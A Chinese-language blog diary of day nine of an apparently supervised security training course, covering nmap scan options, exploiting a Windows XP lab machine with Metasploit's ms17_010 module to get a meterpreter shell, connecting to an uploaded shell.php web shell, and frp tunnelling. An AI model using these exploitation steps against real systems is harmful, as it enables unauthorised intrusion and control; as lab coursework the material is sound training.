实训第九天

  1. 端口扫描

image-20220720092914489.png

  1. nmap使用学习

扫描主机:【-sn:不扫描端口,只ping主机】【通过ICMP echo判定主机是否存活】

image-20220720094900481.png

端口扫描:【-sS:TCP SYN扫描,可以查看端口开放情况】【-PO:使用ICMP协议进行ping】

image-20220720095511836.png

扫描指定端口:

image-20220720095630511.png

系统探测:【-sV:检测系统版本】【-O:尝试识别远程操作系统】【-V:详细输出扫描情况】【-A:同时打开操作系统指纹和版本检测】

image-20220720102327551.png

## 远程管理

  1. msf 关闭litexp的防火墙
  2. kali中打开msf: msfconsole

    image-20220720101539820.png

  3. 在nmap发现了windows xp的虚拟机后,查找ms17_010的攻击载荷准备攻击
    search 17_010

    image-20220720101600190.png

  4. 在搜索结果中选择4:use 4
  5. 设置攻击目标(litexp): set rhost 192.168.x.x
  6. 开始攻击:run

    image-20220720101731959.png

  7. 获取meterpreter后,执行shell(中文系统部分乱码)

    image-20220720101758054.png

  8. 执行系统命令,管理服务器(彻底控制虚拟机)

    如ipconfig、shutdown -s -t 10 -c "10秒内关机!"

    image-20220720101828031.png

反弹shell

kali连接winXP(利用之前upload上传的shell.php脚本从蚁剑连接)

image-20220720140703043.png

kali连接ubuntu22.0.4

image-20220720141122542.png

frp

借用公网frps流量转发服务,通过公网域名和端口,访问虚拟机内部网站,实现内网穿透。

按照老师发的服务器信息和自己想要映射的ip端口配置frpc.ini即可,访问自己的端口如下(开了本机的phpstudy)

image-20220720162256186.png

burp攻击反制

image-20220720173024174.png

image-20220720173021089.png

建议使用高版本的 burp

最后修改:2022 年 07 月 23 日
如果觉得我的文章对你有用,请随意赞赏